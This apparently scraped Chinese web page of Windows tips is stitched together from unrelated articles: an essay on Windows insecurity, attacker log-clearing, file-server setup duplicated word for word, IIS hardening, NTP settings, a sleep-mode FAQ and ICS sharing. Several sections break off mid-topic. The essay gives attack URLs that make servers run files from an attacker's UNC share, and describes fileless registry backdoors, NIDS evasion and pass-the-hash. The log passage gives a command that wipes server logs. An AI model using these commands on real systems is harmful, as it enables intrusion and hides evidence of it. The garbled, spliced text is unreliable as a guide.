WIN技巧:为什么WIN不安全
关于Windows 和*nix 谁更安全的讨论很多。*nix 大家知道存在着suid之类的死穴,那么Windows的哪些特点始终与安全问题纠结在一起呢?
一:代码庞大,代码重用
有一个“小程序定理”:程序中的bug 和程序大小成正比。还有一句谚语:凡可能出错的地方就一定会出错。微软的程序员不是神,那么多行代码,还要求软件工程学上的完美,
代码重用……昨天ilsy跟我提到那个ldap溢出,其实就是一个根本不该犯的错误,但是仍然犯了。要求代码重用就意味着在某个版本上出现的问题,就可能会在后续版本中都有问题,其他重用此代码的程序中也可能会有问题。
曾经有人说Windows .net出来,搞Windows 安全的就没饭吃了,我看一定不会,盖兹不会那么残忍。
二:盲目追求易用性和兼容性
毕竟是开公司,当然是怎么赚钱最多就怎么搞,听casper说微软花上百万去研究按钮的
光源从哪个角度照下来好看。好用的东西,傻瓜的东西,大家当然愿意买。所以默认就什么都支持,什么都包含,什么都关联什么都兼容。
三:废话不说了,说点实在的。
1、unicode的支持
IIS的unicode漏洞我就不多说了,其实除了IIS,其他还有不少Windows上的web 服务器存在类似问题。因为对unicode 的解码是系统内核完成的,真要想把错误解码问题解决,估计花钱不会少。我发现微软其实并没有在unicode 漏洞的补丁中真正把错误解码纠正,而只是简单过滤了一些危险的字符编码。主要是不允许“.”和“/”或者“”在一起出现,否则就报错。所以我们仍然能用错误解码来做一些事情,譬如说对付NIDS。把我们要扫描或者利用的http请求转换成错误编码格式,大多数的NIDS都是不能识别的。大家可以试验一下,看看是不是有哪家的NIDS 可以检测到这个。附录1是我自己搞的一个Windows 中文版unicode错误解码表,不一定很全,大家可以参考。有兴趣的可以用这张表搞一个扫描器,对每一个字符随机使用正常unicode编码、utf8 编码和错误解码,看看是否还有什么NIDS可以识别。
我甚至相信在XP中,这个问题也未必会得到根本的解决。
2、扩展名欺骗
我们都认为Windows下文件性质由扩展名决定,也很容易相信一个doc(关掉宏的话)或者gif文件是无害的。但事实上,Windows不完全是按照扩展名来处理文件的,它会根据文件头部的信息对文件性质作初步的判断。NT 4就曾经出现过这样的问题:对于一个EXE 文件,当命名为.DOC时,双击运行,系统仍然按照EXE文件来加载执行!即使Windows 2000下,我们把一个EXE 文件扩展名改成任意的,在命令提示符下仍然会当作EXE文件运行:
C:>test.exe
only test !
C:>ren test.exe test.txt
C:>test.txt
only test !
C:>ren test.txt test.any
C:>test.any
only test !
幸好在资源管理器里双击运行时不存在这样的问题。但是EXE文件扩展名改为.com .cmd .bat .pif .scr仍然能正常双击运行,还有一定欺骗性。不少邮件病毒就是用了类似的手段。
3、8.3文件名,16位子系统,POSIX子系统,OS2子系统
能运行16位程序、OS2、POSIX 程序也是Windows NT/2000的一个卖点。但是由于对这些的支持需要使用一些系统级的 Privilege,也可以认为是某种意义上的suid,所以造成了安全隐患。历史上NT 4就曾经由于POSIX 子系统的问题出现过提升权限的漏洞。一般的系统加固手册中都会要求关掉这些支持。
Dos对长文件名会作截短处理,Windows NT/2000虽然支持长文件名,但默认也支持截短后的8.3 格式。当我们对某个文件进行基于文件名的访问控制的时候,就有可能通过使用截短的8.3 文件名来绕过控制。对于某些设计未考虑此问题的WEB服务器来说,就可能导致CGI源码泄漏。
4、“/”“”不分
Windows 下一般使用“”表示目录,但是对“/”也可以接受,这和*nix仅仅支持“/”是不同的,
在编写asp、php等的时候,以及在写WEB 服务器之类程序的时候,如果没有把这两种都考虑到,往往会导致对WEB上级目录的越权访问。以前Win32 Apache就有这个问题。
5、UNC路径支持
对UNC 路径的支持可以使我们很简单的访问远程文件,但它所带来的安全问题也的确是太多了。首先,UNC 几乎在任何地方都可以被使用,可以有无数种方法欺骗用户访问入侵者的机器,而Windows NT/2000 的认证机制为了易用性,默认会在你访问的时候主动把当前用户密码散列值发送过去,对于没有加固的系统来说,散列值和密码本身几乎是没有什么区别的。
Windows NT/2000上安装Apache + php后,默认存在一个“/cgi-bin/php.exe?”的漏洞,漏洞发现者告诉我们这个问题可以被用来察看系统的任意文本,但事实上这个漏洞完全可以获得远程shell。因为我们可以这样:
cgi-bin/php.exe?myipshareevil.php。
如果*nix上存在这个问题,就仅仅只能用来看文件DD除非你能传文件上去。
类似的,在一些漏洞的利用中,即使用户对所有目录都不可写,我们仍然可以运行指定的程序:host/scripts/../../cmd.exe?/c+myhostshareevil.exe
同样还可以用UNC 路径来安装真正无文件的后门,只要在注册表某个可以自启动的项上或者计划任务列表中添加一个指向UNC路径的程序即可。这个文件是不存在于本地硬盘上的,甚至也不会在临时文件夹里,可以躲过很多审核工具。
要去除对UNC路径的支持,可以禁用DeviceMup设备。
6、设备文件名问题
*nix 的一个特色是“一切皆文件”,大概是受其影响,Windows NT/2000的很多设备也可以通过字符链接作为文件访问。有些程序在编写的时候,为防止对任意驱动器的访问的控制手段设计考虑不足,如果我们通过“.D:”这样的方式来试图访问D:盘,就可能绕过一些编写不当的程序。
为了向上兼容,DOS设备文件名,如“PRN”、“CON”等在Windows NT/2000下仍然被支持。9X 下可以通过简单的直接对DOS 设备文件名的访问导致蓝屏,Windows NT/2000下做了一些处理,但是很多程序还是存在类似的问题,譬如Lotus Domino Server、OE等,甚至IIS在某些特殊情况下也会受影响导致拒绝服务。
又因为这些设备文件名是“无处不在”的,当我们需要某种类型文件来做点事情的时候就用得上了。先假设存在一个.plx的溢出,但是WEB目录下根本没有.plx 文件,这时候我们就可以用con.plx这样的文件来传递溢出代码了。
7、注册表庞大而复杂
注册表对于Windows 来说太重要了,也有太多的东西了,其中还有那么多是未公开的。如果在注册表里留个后门,弄得好的话,几乎是不可能被审核出来的。所以定期备份注册表文件对一个Windows系统管理员来说是很重要的。
8、WSH,script
WSH对象实在太强大了,再加上系统脚本引擎是默认安装的,又在包括IE、Office等的MS软件中被广泛支持,所以难免出问题。纵观IE,outlook的漏洞,很多都和这个有关。
9、系统权限分配繁冗
Windows NT/2000中几乎每个东西都可以设置权限,每一个对象,注册表项,设备……这么庞大的访问控制列表,实在难以一一审核,而其中很多都可以被用来作为后门。
10、默认兼容lanman验证
早在Windows NT 4.0的时代,就有人提出了传递散列值的进攻方法。因为在lanman验证方法中只是简单的比对MD 4散列值。那么理论上只要我们有了帐号和口令的散列值就可以通过lanman 验证,而不需要用l0pht Crack之类的工具去解出口令。由于这种攻击方式需要从根本上改动验证过程,而修改Windows内核过于困难,当时的发现者是使用修改Samba的方法来实现的,而且代码并未公开。最近有人对此提出可一个新思路,并公开了代码,可以在各种平台上实现,使得这个问题的风险大大增加了。所以在作系统加固的时候一定要把验证方式改掉。
11、设计失误
打开“我的电脑”,选择“工具→文件夹选项”,在弹出的对话框中选择“文件类型”选项卡,选中要添加打开方式的“文本文档”,单击“高级”按钮,这里列出了在文本文件上单击右键可以执行的两种操作: open(打开)和print(打印),单击“新建”按钮,在弹出的对话框中输入操作的名称(比如:“用Word打开”),这个提示信息将出现在右键快捷菜单中,
然后再单击“浏览”按钮,选择用于执行操作的应用程序。
一、攻击者清除日志的常用伎俩
1、Web服务器系统中的日志
以Windows Server 2003平台的Web服务器为例,其日志包括:安全日志、系统日志、应用程序日志、WWW日志、FTP日志等。对于前面的三类日志可以通过“开始→运行”输入eventvwr.msc打开事件查看器进行查看,WWW日志和FTP日志以log文件的形式存放在硬盘中。具体来说这些日志对应的目录和文件为:
(1).安全日志文件:C:WINDOWSsystem32configSecEvent.Evt
(2).系统日志文件:C:WINDOWSsystem32configSysEvent.Evt
(3).应用程序日志文件:C:WINDOWSsystem32configAppEvent.Evt
(4).FTP日志默认位置:C:WINDOWSsystem32LogfilesMSFTPSVC1
(5).WWW日志默认位置:C:WINDOWSsystem32LogfilesW3SVC1
2、非法清除日志
上述这些日志在服务器正常运行的时候是不能被删除的,FTP和WWW日志的删除可以先把这2个服务停止掉,然后再删除日志文件,攻击者一般不会这么做的,
系统和应用程序的日志是由守护服务Event Log支持的,而它是没有办法停止的,因而是不能直接删除日志文件的。攻击者在拿下Web服务器后,一般会采用工具进行日志的清除,其使用的工具主要是CL和CleanIISLog。
(1).利用CL彻底清除日志
这个工具可以彻底清除IIS日志、FTP日志、计划任务日志、系统日志、安全日志等,使用的操作非常简单。
在命令下输入“cl -logfiles 127.0.0.1”就可以清除Web服务器与Web和FTP和计划任务相关的日志。其原理就是先把FTP、WWW、Task Scheduler服务停止再删除日志,然后再启动三个服务。(图2)
点击该界面上的“添加或删除角色”链接,将启动一个配置服务器的向导。点击“下一步”进入到“服务器角色”步骤,在Windows Server 2003支持的角色列表中选择文件服务器并点击“下一步”,开始启用和配置文件服务的过程。
根据系统提示进行配额设置,磁盘配额功能可以限制用户对磁盘空间的使用,方便进行磁盘空间管理。将磁盘空间限制设置为300MB,将警告设置为260MB,并勾选“拒绝将磁盘空间给超过配额限制的用户”这一选项。
这种情况下用户将无法使用超过300MB以上的硬盘空间,并且当用户使用的空间达到设置的260MB的警戒线时记录一个系统事件。
完成配额设置后点击“下一步”进入索引服务设置界面,默认的选项是不启用索引服务。虽然索引服务可以加快文件检索的速度,但是由于它要消耗不少的服务器资源,所以如果不需要很频繁检索文件的话,建议保留默认的设置。
在确认以上设置之后,安装向导会弹出一个用于建立共享文件夹的向导。首先需要选择共享文件夹的路径,例如C:/Inetpub/home。之后进入维护共享名和关于该共享描述的界面,通常情况下维持默认设置即可。点击下一步开始为共享设置权限,基本的权限包括了完全访问和读写权限。
选择“使用自定义共享和文件夹权限”,点击自定义按钮之后弹出自定义权限设置界面。在这里可以根据需要对不同用户设置不同的权限,例如可以对Administrators用户组设置完全控制以赋予所有管理员对该共享文件夹的全部管理权限,为Guest用户设置读取权限,使匿名用户可以下载该文件夹中的文件,同时删除原有的Everyone这项,屏蔽所有其他用户权限。
至此就完成了基本的共享设置,如果还有其他文件夹需要设置成共享,可以在关闭该向导之前勾选“关闭后再次运行该向导”的选项继续进行下一个共享的设置。结束所有向导之后,可以看到“管理您的服务器”界面中多了一项文件服务器的内容,点击“管理此文件服务器”链接就可以打开文件服务器管理界面,在此可以进行各种文件服务的管理。
另外,在进入右键菜单的属性条目时,也可以进行共享和权限等管理,但是只有在点击的对象是磁盘分区的时候才能应用配额功能,因为配额功能是针对磁盘卷来执行的,而且该卷必须是NTFS格式的。
文件的备份与还原
由于数据的安全性和可用性对于文件服务器来说也是非常重要的,所以在设置完文件服务器的权限和配额等参数之后,需要对文件进行备份和还原工作。Windows Server 2003的备份功能使用了称为卷影副本(Volume Shadow Copy)的技术。
在文件服务器管理界面可以找到“备份文件服务器”链接,在命令行执行ntbackup命令可以获得与点击该链接相同的效果,即执行备份向导。
将“总是以向导模式启动”的选项勾掉,在下次执行该命令的时候即可直接进入“备份工具”界面。在该界面中可以看到,Windows Server 2003除了备份和还原功能之外还包括了一项称为自动系统恢复向导(AMR)的功能,该功能主要用于对系统分区进行备份,这里主要讲解以卷影副本技术为基础的标准备份功能,用户可以根据系统指示进行操作。
卷影副本功能以事先计划的时间间隔为存储在共享文件夹中的文件创建备份,并且可以将文件恢复成任意一次备份时的版本。卷影副本的恢复行为可以在客户端进行,有效地提高数据还原的效率,不用每次都麻烦管理员来进行操作,用户也可以随时进行和自己数据相关的还原操作。
进行这些操作需要客户端机器上安装卷影副本客户端程序,通过这台客户端机器浏览到文件服务器上的共享之后,对该共享或该共享中的文件点击右键,其属性对话框中有一个“以前的版本”选项页。在这里显示了文件以前保存过的所有版本,可以将其恢复成任意一个版本。
只有管理员组的成员可以设置卷影副本功能,并且卷影副本必须在NTFS格式的磁盘卷上才能实现。卷影副本默认在启用该功能的卷上保留10%的空间用以保存备份数据(最少100MB),一旦超过空间的限制将覆盖早先创建的副本。
启用卷影副本功能非常简单,在文件服务器管理界面中找到“配置卷影副本”链接,也可以在NTFS卷的右键属性菜单里找到卷影副本的选项页,通过这两种方式可以进入同样的管理界面,实现对卷影副本的启用、禁用以及容量和时间计划等设置。
在“备份工具”管理界面中,用户可以指定哪些文件(包括系统注册表数据及引导文件等)需要参与到备份计划中来,也可以指定执行这些备份操作的时间计划。这些备份操作都是基于卷影副本技术的,备份的结果文件要稍大于备份的内容。
建议用户维护一个按周进行的备份操作,将所有数据重新备份一次,备份过的文件将被标记为“已备份过”;在此同时维护一个按日进行的差异备份计划,备份那些每天修改过的文件。应用这种组合计划进行数据备份更加便于管理,而且能够有效保证数据的可恢复性。
需要注意的是:卷影副本备份占用空间的数量不仅仅取决于备份文件的大小,更决定于文件修改的频率,对于系统分区这样有很多交换文件操作的分区来说,不要进行整个磁盘卷的备份操作。
分布式文件系统
分布式文件系统是Windows系统网络存储构架的核心技术之一,可以实现将网络上位于不同位置的文件挂接在统一命名空间之下。在管理工具中启动“分布式文件系统”工具,首先要建立一个根目录。用右键点击管理界面左侧的“分布式文件系统”,选择“新建根目录”,按照向导填写所需要的信息就可以完成操作。
继续用右键点击刚刚建立的根目录,选择“新建链接”,可以将位于网络中其它计算机上的共享目录链接到刚才建立的根目录上。将所有要汇集到这个根目录上的共享目录都链接过来之后,就可以通过浏览这个根目录下的目录树访问这些文件,而不再需要通过访问多个实际的网络位置使用这些文件,
后记
在这篇文章中笔者介绍了在一台Windows Server 2003服务器上配置文件服务功能,并着重讲解了建立共享、配额管理、权限设置和备份方面的操作。本文中的大部分内容也适用于Windows 服务器。Windows Server 2003还有一些更高级的文件功能可以在文件服务器上进行应用,例如文件加密、虚拟磁盘等。
Windows Server 2003的管理工具中有一项功能叫做“管理您的服务器”,启动该工具之后 ,可以看到当前服务器上启用的所有服务,并可对这些服务进行管理。
点击该界面上的“添加或删除角色”链接,将启动一个配置服务器的向导。点击“下一步”进入到“服务器角色”步骤,在Windows Server 2003支持的角色列表中选择文件服务器并点击“下一步”,开始启用和配置文件服务的过程。
根据系统提示进行配额设置,磁盘配额功能可以限制用户对磁盘空间的使用,方便进行磁盘空间管理。将磁盘空间限制设置为300MB,将警告设置为260MB,并勾选“拒绝将磁盘空间给超过配额限制的用户”这一选项。
这种情况下用户将无法使用超过300MB以上的硬盘空间,并且当用户使用的空间达到设置的260MB的警戒线时记录一个系统事件。
完成配额设置后点击“下一步”进入索引服务设置界面,默认的选项是不启用索引服务。虽然索引服务可以加快文件检索的速度,但是由于它要消耗不少的服务器资源,所以如果不需要很频繁检索文件的话,建议保留默认的设置。
在确认以上设置之后,安装向导会弹出一个用于建立共享文件夹的向导。首先需要选择共享文件夹的路径,例如C:/Inetpub/home。之后进入维护共享名和关于该共享描述的界面,通常情况下维持默认设置即可。点击下一步开始为共享设置权限,基本的权限包括了完全访问和读写权限。
选择“使用自定义共享和文件夹权限”,点击自定义按钮之后弹出自定义权限设置界面。在这里可以根据需要对不同用户设置不同的权限,例如可以对Administrators用户组设置完全控制以赋予所有管理员对该共享文件夹的全部管理权限,为Guest用户设置读取权限,使匿名用户可以下载该文件夹中的文件,同时删除原有的Everyone这项,屏蔽所有其他用户权限。
至此就完成了基本的共享设置,如果还有其他文件夹需要设置成共享,可以在关闭该向导之前勾选“关闭后再次运行该向导”的选项继续进行下一个共享的设置。结束所有向导之后,可以看到“管理您的服务器”界面中多了一项文件服务器的内容,点击“管理此文件服务器”链接就可以打开文件服务器管理界面,在此可以进行各种文件服务的管理。
另外,在进入右键菜单的属性条目时,也可以进行共享和权限等管理,但是只有在点击的对象是磁盘分区的时候才能应用配额功能,因为配额功能是针对磁盘卷来执行的,而且该卷必须是NTFS格式的。
文件的备份与还原
由于数据的安全性和可用性对于文件服务器来说也是非常重要的,所以在设置完文件服务器的权限和配额等参数之后,需要对文件进行备份和还原工作。Windows Server 2003的备份功能使用了称为卷影副本(Volume Shadow Copy)的技术。
在文件服务器管理界面可以找到“备份文件服务器”链接,在命令行执行ntbackup命令可以获得与点击该链接相同的效果,即执行备份向导。
将“总是以向导模式启动”的选项勾掉,在下次执行该命令的时候即可直接进入“备份工具”界面。在该界面中可以看到,Windows Server 2003除了备份和还原功能之外还包括了一项称为自动系统恢复向导(AMR)的功能,该功能主要用于对系统分区进行备份,这里主要讲解以卷影副本技术为基础的标准备份功能,用户可以根据系统指示进行操作。
卷影副本功能以事先计划的时间间隔为存储在共享文件夹中的文件创建备份,并且可以将文件恢复成任意一次备份时的版本。卷影副本的恢复行为可以在客户端进行,有效地提高数据还原的效率,不用每次都麻烦管理员来进行操作,用户也可以随时进行和自己数据相关的还原操作。
进行这些操作需要客户端机器上安装卷影副本客户端程序,通过这台客户端机器浏览到文件服务器上的共享之后,对该共享或该共享中的文件点击右键,其属性对话框中有一个“以前的版本”选项页。在这里显示了文件以前保存过的所有版本,可以将其恢复成任意一个版本。
只有管理员组的成员可以设置卷影副本功能,并且卷影副本必须在NTFS格式的磁盘卷上才能实现。卷影副本默认在启用该功能的卷上保留10%的空间用以保存备份数据(最少100MB),一旦超过空间的限制将覆盖早先创建的副本。
启用卷影副本功能非常简单,在文件服务器管理界面中找到“配置卷影副本”链接,也可以在NTFS卷的右键属性菜单里找到卷影副本的选项页,通过这两种方式可以进入同样的管理界面,实现对卷影副本的启用、禁用以及容量和时间计划等设置。
在“备份工具”管理界面中,用户可以指定哪些文件(包括系统注册表数据及引导文件等)需要参与到备份计划中来,也可以指定执行这些备份操作的时间计划。这些备份操作都是基于卷影副本技术的,备份的结果文件要稍大于备份的内容。
建议用户维护一个按周进行的备份操作,将所有数据重新备份一次,备份过的文件将被标记为“已备份过”;在此同时维护一个按日进行的差异备份计划,备份那些每天修改过的文件。应用这种组合计划进行数据备份更加便于管理,而且能够有效保证数据的可恢复性。
需要注意的是:卷影副本备份占用空间的数量不仅仅取决于备份文件的大小,更决定于文件修改的频率,对于系统分区这样有很多交换文件操作的分区来说,不要进行整个磁盘卷的备份操作。
分布式文件系统
分布式文件系统是Windows系统网络存储构架的核心技术之一,可以实现将网络上位于不同位置的文件挂接在统一命名空间之下。在管理工具中启动“分布式文件系统”工具,首先要建立一个根目录。用右键点击管理界面左侧的“分布式文件系统”,选择“新建根目录”,按照向导填写所需要的信息就可以完成操作。
继续用右键点击刚刚建立的根目录,选择“新建链接”,可以将位于网络中其它计算机上的共享目录链接到刚才建立的根目录上。将所有要汇集到这个根目录上的共享目录都链接过来之后,就可以通过浏览这个根目录下的目录树访问这些文件,而不再需要通过访问多个实际的网络位置使用这些文件。
后记
新建立一个站,采用默认向导,在设置中注意以下在应用程序设置里:执行权限为默认的纯脚本,应用程序池使用独立的名为:315safe的程序池。
服务器安全配置终极技巧图(下)(图一)” />
名为315safe的应用程序池可以适当设置下“内存回收”:这里的最大虚拟内存为:1000M,最大使用的物理内存为256M,这样的设置几乎是没限制这个站点的性能的。
在应用程序池里有个“标识”选项,可以选择应用程序池的安全性帐户,默认才用网络服务这个帐户,大家就不要动它,能尽量以最低权限去运行大,隐患也就更小些。在一个站点的某些目录里,譬如这个“uploadfile”目录,不需要在里面运行asp程序或其他脚本的,就去掉这个目录的执行脚本程序权限,在“应用程序设置”的“执行权限”这里,默认的是“纯脚本”,我们改成“无”,这样就只能使用静态页面了。依次类推,大凡是不需要asp运行的目录,譬如数据库目录,图片目录等等里都可以这样做,这样主要是能避免在站点应用程序脚本出现bug的时候,譬如出现从前流行的upfile漏洞,而能够在一定程度上对漏洞有扼制的作用,
在默认情况下,我们一般给每个站点的web目录的权限为IIS用户的读取和写入,如图:
但是我们现在为了将SQL注入,上传漏洞全部都赶走,我们可以采取手动的方式进行细节性的策略设置。
给web根目录的IIS用户只给读权限。如图:
然后我们对响应的uploadfiles/或其他需要存在上传文件的目录额外给写的权限,并且在IIS里给这个目录无脚本运行权限,这样即使网站程序出现漏洞,入侵者也无法将asp木马写进目录里去,呵呵, 不过没这么简单就防止住了攻击,还有很多工作要完成。如果是MS-SQL数据库的,就这样也就OK了,但是Aclearcase/“ target=”_blank“ >ccess的数据库的话,其数据库所在的目录,或数据库文件也得给写权限,然后数据库文件没必要改成。asp的。这样的后果大家也都知道了把,一旦你的数据库路径被暴露了,这个数据库就是一个大木马,够可怕的。其实完全还是规矩点只用mdb后缀,这个目录在IIS里不给执行脚本权限。然后在IIS里加设置一个映射规律,如图:
这里用任意一个dll文件来解析。mdb后缀名的映射,只要不用asp.dll来解析就可以了,这样别人即使获得了数据库路径也无法下载。这个方法可以说是防止数据库被下载的终极解决办法了。
该设置打开NTP服务器功能(默认是不开启NTP Server服务,除非电脑升级成为域控制站)
2、修改以下键值HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeConfigAnnounceFlags设定为5.
该设定强制主机将它自身宣布为可靠的时间源,从而使用内置的互补金属氧化物半导体 (CMOS) 时钟,
如果要采用外面的时间服务器就用默认的 a 值即可.
3、重启Win32Time服务: net stop w32Time && net start w32Time
Client 端设置(Run -->regedit):
1、修改HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeTimeProvidersNtpClient
SpecialPollInterval 值修改成十进制43200 (单位为秒,43200为12小时)
SpecialPollTimeRemaining 值修改成[时间同步服务器],0 如:192.168.1.1,0
2、更改默认更新服务器
HKEY_LoCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONDATETIMESERVERSdefault
WIN技巧:删除WIN中被保护的文件
,
答:虽然待机、休眠优点都很明显,但对硬件和系统都要求支持ACPI/APM,如果支持不好的硬件或系统上强行使用待机、休眠功能,很容易丢失数据,系统不稳定甚至崩溃;同时,只有在真正关机的情况下,才可以进行硬件改动,比如更换设备,加内存升级等,因此它们都不能取代关机,
问:不小心在“开始→关机”中的“待机”给弄丢了,请问该如何恢复?
答:一般来讲,这类问题只要重装主板驱动程序就能够解决,或者将“设备管理器”中的支持“ACPI”的硬件删掉,然后重启机器,根据系统提示重新安装这些硬件。如果在新安装的系统上无法待机和休眠,或执行这些功能后系统无法启动,请首先在BOIS中确认已经将STD、STR打开了,如果已经打开,就要确认硬件是否支持ACPI(特别是主板),或考虑硬件冲突的问题了。
问:我使用的是Windows XP,在屏幕保护程序窗口中我已经将“在恢复时使用密码保护”选择上了,但奇怪的是它并不起任何作用。屏保启动后,动一下键盘或鼠标就会结束屏保,并没有出现让输入密码的窗口呀!
答:在Windows XP下,只将“在恢复时使用密码保护”选择上并不起作用。在桌面上右键打开“属性”,在电源选项属性窗口中选“高级”,勾选“在计算机从待机状态恢复时,提示输入密码”。此外,Windows XP的屏保密码和Windows 9x的也不同,密码不能另外设置,只能使用系统登录时的用户密码打开。
问:有时我的电脑已经用了很长时间,想去休息一下,这时选择了让电脑休眠,但电脑经常一点儿反应都没有?
答:休眠是将内存中的数据保存到硬盘上,由于电脑运行的时间较长,而部分不经常运行的数据保存到了虚拟内存中,这时选择休眠而虚拟内存中部分数据没能及时地释放出来的话,就会发生执行休眠后没有反应的现象了,
遇到这种情况,建议最好还是将电脑重启。
问:我在做图或者编程的时候经常要思考一下,所以离开电脑。但有时思考时间过长,再要用电脑时经常会造成死机,请问这是为什么?
答:对于许多喜欢制图,编程的用户来说,要注意在程序调试的过程中尽量避免进入休眠状态,因为Windows启动屏幕保护、进入休眠是通过检测输入信号(如移动/单击鼠标)进行的。在制图,编程时,电脑工作总是很忙碌,但此时并不需要通过外界进行任何输入,如果这个时候电脑休眠的话,CPU和内存中的数据就会处于一种“隔离”状态,再次唤醒时,由于唤醒电脑本身通过软件进行,需要占有CPU和内存资源,这样往往会出现内存数据出错,导致蓝屏甚至死机。所以,要尽量做到长时间不用电脑时要先进行存盘,以免造成不必要的损失。
问:为什么进入桌面的“电源选项→休眠”选项后,“启用休眠支持”复选框为灰色不可选?
答:当前系统盘的剩余空间小于内存空间,而休眠时要将内存中的所有内容保存到硬盘上,所以硬盘剩余空间要大于等于内存的容量。清理磁盘,在系统盘中腾出足够的空间即可。
问:为什么我的Windows XP自动从待机状态恢复,但过了两分钟后又自动进入待机呢?
答:这一般是由于网卡的网络唤醒(Wake-on-LAN)功能导致的。请按下Win+Break组合键打开“系统属性”窗口,接着进入“硬件→设备管理器”,双击展开“网络适配器”,然后再双击其中的网卡项打开属性窗口,在“电源管理”选项卡中取消“允许这台设备使计算机脱离待机状态”的勾选。
问:为什么我的Windows XP在待机恢复后,无法识别USB存储设备呢?
答:如果你是这样的操作流程:将USB存储设备插入电脑→进入待机状态→在待机过程中取下存储设备并插入另外一个USB端口→从待机中恢复。便会遇到无法识别USB存储设备的故障。解决起来也很简单,只要将存储设备插回原来的USB端口即可。
同样,为你的Windows操作系统编写的脚本为计算机执行指令提供了分步指南,不过这种脚本没有演出的脚本那样详细。最简单的脚本仅仅是一个列出要运行的指令的简短的文本文件。任何可以从命令行执行的指令都可以自动添加到一个脚本文件中。
脚本可以通过Windows网络中的用户账户属性分配给一个人。然而,使用Windows域名网络中的组策略效率会更高。你可以规定脚本在计算机启动或者关闭的时候自动执行,你也可以指定脚本在用户登录或者退出登录的时候运行。
按照这种方法使用脚本文件,Windows脚本就能够自动在计算机系统上安装补丁和升级软件。通过在服务器上使用补丁,并且创建一个登录脚本文件以便在每一次启动计算机或者访问这台计算机的时候都将自动执行补丁安装程序,系统管理员就可以保证每一个用户都能够收到最新升级程序。
微软的脚本中心的脚本文件库包含各种各样的脚本文件。这些脚本文件可用来管理Windows台式电脑,
下面这个脚本是专门用于安全的:
安装一个升级软件:编辑一个安装微软补丁的脚本。这个脚本链接是:www.microsoft.com/technet/scriptcenter/scripts/sus/client/suclvb03.mspx
修改升级时间安排:编辑一个在客户机上自动更新设置的配置脚本。这个脚本链接是:www.microsoft.com/technet/scriptcenter/scripts/sus/client/suclvb10.mspx
以这种方法使用补丁显然比购买和安装补丁管理软件更便宜。然而,这种脚本缺乏这类工具的许多功能,如跟踪补丁是否成功地使用、自动召回或者撤销可能引起网络故障的补丁以及创建一个报告说明当前的状态或者查看补丁在环境中的使用情况。还有一些脚本可以完成这些工作。但是,那些脚本更繁琐,比使用一个完整的补丁解决方案更耗费时间。
实现方式一:
1、硬件的准备,作为服务器的计算机需要安装两块网卡,一块与ADSL Modem连接,另一块与内网计算机或HUB连接。为了节约成本,可以将两台机器(服务器与客户机)用了一根交叉线连上就可以了,当然如果多于一个客户机就需要HUB了。
2、新建一个ADSL拨号连接。
3、由于Win2003默认安装是没有为 ICS 配置客户端计算机的,因此需要进行配置,才能使客户端计算机访问Internet,配置的方法是:
1)插入 Windows Server 2003 Standard Edition 或 Windows Server 2003 Enterprise Edition 光盘。
2)“欢迎”屏幕出现后,单击“执行其他任务”,然后单击“浏览光盘内容”。
3)在目录“SUPPORTTOOLS”,找到Netsetup.exe,双击执行,
4)按屏幕上的指示进行操作,重新启动机器即可。
这种情况下默认会启用网桥。
4、对于客户端计算机,由于启用“Internet连接共享”后,服务器中连接内网的(如“本地连接2”)的IP地址将被系统自动设置为“192.168.0.1”。如果内网中其他计算机的IP地址不属于该网段,则通信可能会终止。因此将客户端计算机的I P地址设置为自动获取模式,无须指定网关即可实现共享上网。
实现方式二:
当然这是一个十分标准的安装过程,但是实际安装过程中,可能用户已经对ICS进行过配置,并且没有启用网桥。那么也可以相应设置实现共享。设置方法如下:
1、在“网络连接”对话框中右键点击ADSL连接图标,选择“属性”,打开“属性”对话框,然后进入“高级”选项卡,勾选“Internet连接共享”中的“允许其他网络用户通过此计算机的Internet连接来连接”选项。
2、然后在“家庭网络连接”下拉列表中选中连接内网计算机或HUB的本地连接(例如为“本地连接2”)。其他选项保持默认设置,最后单击“确定”按钮。
总结
【WIN技巧:为什么WIN不安全】推荐阅读:
心智图学习有什么技巧步骤10-07
谈恋爱的说话技巧有什么10-28
你不知道的学习物理的技巧10-12
什么不容易作文800字09-10
不认识的英文是什么09-29
不读书不吃苦你要青春做什么读后感07-10
世界上什么人最不花心脑筋急转弯09-27
360安全卫士使用技巧09-06
安全工程师考试技巧05-26
小技巧让WinPE更安全06-26